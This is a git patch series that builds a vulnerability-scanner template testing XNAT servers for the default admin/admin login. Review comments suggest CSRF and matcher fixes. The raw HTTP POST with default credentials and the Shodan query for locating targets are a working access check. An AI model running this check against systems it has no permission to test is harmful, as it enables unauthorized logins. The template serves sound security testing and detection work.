From 1a41583c2f5518db9d761d5f194ef0585d1cef1d Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 1 Nov 2022 06:35:13 +0900 Subject: [PATCH 1/4] Create xnat-default-login.yaml --- xnat-default-login.yaml | 45 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 xnat-default-login.yaml diff --git a/xnat-default-login.yaml b/xnat-default-login.yaml new file mode 100644 index 0000000000..cc2165c3e3 --- /dev/null +++ b/xnat-default-login.yaml @@ -0,0 +1,45 @@ +id: xnat-default-login + +info: + name: XNAT Default Login + author: 0x_Akoko + severity: high + description: XNAT default login information (admin/admin) was discovered. + classification: + cwe-id: CWE-798 + tags: xnat,default-login + +requests: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/app/template/Login.vm + + login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF= + + cookie-reuse: true + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + part: location + words: + - "app/template/Index.vm?login=true" From 513f2baa93ff3f64b9683dcce91b5a8c61c76a26 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 1 Nov 2022 03:24:50 +0530 Subject: [PATCH 2/4] Update xnat-default-login.yaml --- xnat-default-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/xnat-default-login.yaml b/xnat-default-login.yaml index cc2165c3e3..8147a4a94a 100644 --- a/xnat-default-login.yaml +++ b/xnat-default-login.yaml 
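Review bot: The priming `GET /login` has its response discarded, because the POST sends `XNAT_CSRF=` empty and `cookie-reuse: true` only carries the session cookie across, so the first request adds a round trip per target without feeding the one field it could populate. If XNAT puts a token in the login form under that name (inferred from the field name; confirm against a live instance), an `extractors` entry on the first request with `type: regex`, `internal: true` and a `name`, substituted into the body as `XNAT_CSRF={{name}}`, would keep the check working if the token is ever enforced; if the token is not checked for `login_method=localdb`, the GET is dead weight and the POST alone suffices. Whichever holds, record it in a comment next to the body line, e.g. `# XNAT_CSRF left empty: token not enforced on the localdb login POST when verified`, so the empty token is not read as an oversight later.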
@@ -7,6 +7,9 @@ info: description: XNAT default login information (admin/admin) was discovered. classification: cwe-id: CWE-798 + metadata: + verified: true + shodan-dork: http.title:"XNAT" tags: xnat,default-login requests: From 9bb662bc8a49edb14d1472105c3b98dfddac9bf9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Nov 2022 11:48:37 +0530 Subject: [PATCH 3/4] Update and rename xnat-default-login.yaml to default-logins/xnat-default-login.yaml --- .../xnat-default-login.yaml | 26 +++++++------------ 1 file changed, 9 insertions(+), 17 deletions(-) rename xnat-default-login.yaml => default-logins/xnat-default-login.yaml (69%) diff --git a/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml similarity index 69% rename from xnat-default-login.yaml rename to default-logins/xnat-default-login.yaml index 8147a4a94a..b5baf695c5 100644 --- a/xnat-default-login.yaml +++ b/default-logins/xnat-default-login.yaml @@ -5,30 +5,20 @@ info: author: 0x_Akoko severity: high description: XNAT default login information (admin/admin) was discovered. - classification: - cwe-id: CWE-798 metadata: verified: true - shodan-dork: http.title:"XNAT" - tags: xnat,default-login + shodan-query: http.title:"XNAT" + tags: default-login,xnat requests: - raw: - - | - GET /login HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | POST /login HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/app/template/Login.vm login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF= - cookie-reuse: true attack: pitchfork payloads: username: @@ -38,11 +28,13 @@ requests: matchers-condition: and matchers: + - type: word + part: header + words: + - "app/template/Index.vm?login=true" + - "JSESSIONID" + condition: and + - type: status status: - 302 - - - type: word - part: location - words: - - "app/template/Index.vm?login=true" 
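Review bot: With the priming GET and `cookie-reuse` removed, the `/login` POST is now sent with no prior session and `XNAT_CSRF=` still empty, so the template relies on XNAT not enforcing its CSRF token for the `localdb` login; the `verified: true` metadata suggests that held when tested, but nothing in the file records it, and a server that did check the token would make every target a silent false negative rather than an error. Add a comment above the body line, e.g. `# XNAT_CSRF is intentionally empty: token not enforced on the localdb login POST at verification time; revisit if the template stops matching`. Dropping the `Origin` and `Referer` headers is consistent with the single-request form and needs no further change.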
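Review bot: The new header matcher counts `JSESSIONID` as evidence of a successful login, but a servlet container will typically set that cookie on any response that opens a session, a failed login included (inferred; compare against a wrong-password response), so the word contributes nothing and the match passes only because `condition: and` also requires `app/template/Index.vm?login=true` somewhere in the headers. The discriminating signal is the redirect target, and anchoring it to the `Location` header is more precise than a whole-header substring: replace the word matcher with `- type: regex`, `part: header`, `regex: - "(?i)Location: .*app/template/Index\\.vm\\?login=true"`. Keep the `302` status matcher as it is.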
From aa5b94adda4eaae47230eec95f2f872e9253927d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Nov 2022 11:50:25 +0530 Subject: [PATCH 4/4] Update xnat-default-login.yaml --- default-logins/xnat-default-login.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/default-logins/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml index b5baf695c5..8c9a28b01e 100644 --- a/default-logins/xnat-default-login.yaml +++ b/default-logins/xnat-default-login.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: XNAT default login information (admin/admin) was discovered. + reference: + - https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin metadata: verified: true shodan-query: http.title:"XNAT"